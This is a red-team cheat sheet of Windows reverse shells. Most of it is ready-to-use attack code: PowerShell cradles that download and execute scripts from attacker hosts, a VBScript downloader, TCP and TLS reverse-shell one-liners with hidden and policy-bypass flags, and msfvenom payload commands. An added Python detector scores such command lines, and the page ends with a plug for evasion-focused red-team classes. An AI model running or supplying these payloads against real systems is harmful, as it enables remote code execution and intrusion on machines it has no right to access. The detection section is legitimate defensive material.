Windows Reverse Shells
Power of PowerShell on Windows
Download reverse shells onto the target machine:
Download and execute the script
```powershell
powershell.exe -c iex((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/powerrev.ps1'))
powershell.exe iex(Invoke-WebRequest("http://10.10.10.10:8001/powerrev.ps1") -UseBasicParsing)
powershell.exe iex(iwr('http://10.10.10.10:8001/powerrev.ps1') -UseBasicParsing)
```
Download the reverse shell to the target and save it to disk, then run it:
```powershell
powershell.exe Invoke-WebRequest http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1
```
Multiple ways to download and execute the shell on the victim system:
```powershell
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
```
```powershell
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.56.102:8002/shell.ps1');sleep 2;$response=$ie.Document.body.innerHTML;$ie.quit();$wshell = New-Object -ComObject wscript.shell;$wshell.AppActivate($OpenWindow.MainWindowTitle);Start-Sleep -Seconds 3;$wshell.SendKeys("{ENTER}");iex $response; iex $wshell
```
```powershell
iex (iwr 'http://192.168.230.1/evil.ps1')
```
```powershell
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET', 'http://192.168.56.102:8002/shell.ps1',$false);$h.send();iex $h.responseText
```
```powershell
$wr = [System.Net.WebRequest]::Create("http://192.168.56.102:8002/shell.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
```
Building a VBScript downloader (wget.vbs) line by line from the command prompt:
```batch
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```
Some more PowerShell shells:
```powershell
$LHOST = "10.10.10.10"; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
```
```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.1.1',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
```powershell
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
```
Base64-encoded one-liner (listener started with nc -lvvnp 9001):
```powershell
powershell -e <base64-encoded command>
```
TLS-wrapped variant of the same socket shell:
```powershell
$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
```
Windows stageless reverse TCP
```shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.1.1.1 LPORT=4244 -f exe > reverse.exe
```
Windows staged reverse TCP
```shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe
```
Note on Modern Security Protections and Advanced Tactics
While the reverse shell techniques outlined above are powerful tools in a red teamer's arsenal, modern security systems such as Endpoint Detection and Response (EDR) solutions have become adept at detecting and mitigating them. These protections analyze process behavior, command lines and network traffic to block the known signatures and anomalous patterns associated with reverse shells.
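To make the detection side concrete for both the download cradles listed earlier on this page and the socket one-liners in the previous section, here is an added example (not code from the page or its authors) in Python: it scores process-creation command lines against the traits those payloads share (remote fetch plus in-memory execution, raw TCP/TLS sockets opened from PowerShell, hidden/non-interactive/policy-bypass flags, and -EncodedCommand payloads, which are base64-decoded as UTF-16LE and scored like plaintext). The sample command lines, the indicator weights and the alert threshold are constructed for illustration and would be tuned against real telemetry.

```python
"""Heuristic scoring of process command lines for PowerShell download-cradle
and reverse-shell traits. Added example; weights and samples are constructed."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# (compiled regex, label, weight). Each pattern mirrors a trait of the
# cradles and one-liners catalogued on this page.
INDICATORS = [
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
                r"msxml2\.xmlhttp|winhttprequest", re.I), "remote content fetch", 2),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution", 2),
    (re.compile(r"net\.sockets\.tcpclient|net\.security\.sslstream", re.I),
     "raw socket from PowerShell", 3),
    (re.compile(r"-w(?:indowstyle)?\s+hidden|-noni(?:nteractive)?\b|-nop(?:rofile)?\b|"
                r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
     "hidden/non-interactive/bypass flags", 1),
]
# -e / -enc / -EncodedCommand followed by a base64 token
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
ALERT_THRESHOLD = 4  # constructed threshold; tune against real telemetry


@dataclass
class Finding:
    command_line: str
    labels: List[str] = field(default_factory=list)
    score: int = 0
    decoded: Optional[str] = None  # plaintext of an -EncodedCommand payload, if any

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def score_command_line(command_line: str) -> Finding:
    """Score one command line; a decoded payload is scanned as well, so an
    encoded cradle scores like its plaintext plus a bonus for the encoding."""
    f = Finding(command_line=command_line)
    texts = [command_line]
    f.decoded = decode_encoded_command(command_line)
    if f.decoded is not None:
        f.labels.append("encoded command")
        f.score += 2
        texts.append(f.decoded)
    for pattern, label, weight in INDICATORS:
        if label not in f.labels and any(pattern.search(t) for t in texts):
            f.labels.append(label)
            f.score += weight
    return f


def scan(command_lines) -> List[Finding]:
    return [score_command_line(c) for c in command_lines]


# Constructed sample command lines, as a process-creation log would carry them.
ENCODED_SAMPLE = base64.b64encode(
    "iex((New-Object Net.WebClient).DownloadString('http://10.10.10.10/powerrev.ps1'))"
    .encode("utf-16le")).decode()
SAMPLE_COMMAND_LINES = [
    # plain download cradle
    "powershell.exe -c iex((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/powerrev.ps1'))",
    # hidden, non-interactive socket shell
    "powershell -nop -W hidden -noni -ep bypass -c \"$c = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001)\"",
    # the same cradle hidden behind -EncodedCommand
    f"powershell -e {ENCODED_SAMPLE}",
    # benign maintenance script, should not alert
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for r in scan(SAMPLE_COMMAND_LINES):
        flag = "ALERT" if r.alert else "ok   "
        print(f"{flag} score={r.score} {r.labels} :: {r.command_line[:60]}")
```

Decoding before scoring is the important design choice: a scanner that only looks at the raw command line sees nothing suspicious in `powershell -e <base64>`, which is exactly why the encoded variant is listed above. In practice these command lines come from Sysmon Event ID 1 or Windows Security Event ID 4688 with command-line auditing enabled.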
However, advanced techniques do exist to bypass these protections, which often involve sophisticated methods such as memory injection, obfuscation, and the use of legitimate administrative tools to mimic normal user activities. These advanced methods are not only about evading detection but also about understanding and manipulating the underlying systems and security mechanisms.
To learn more about these advanced evasion techniques and to gain hands-on experience in deploying reverse shells while circumventing modern security defenses, we encourage participation in our live red team classes (sessions). These sessions are designed to provide deep insights into the latest red teaming tactics and real-world applications, enabling participants to stay ahead in the ever-evolving landscape of cybersecurity threats and defenses. Join us to transform your theoretical knowledge into practical expertise and master the art of invisible intrusion.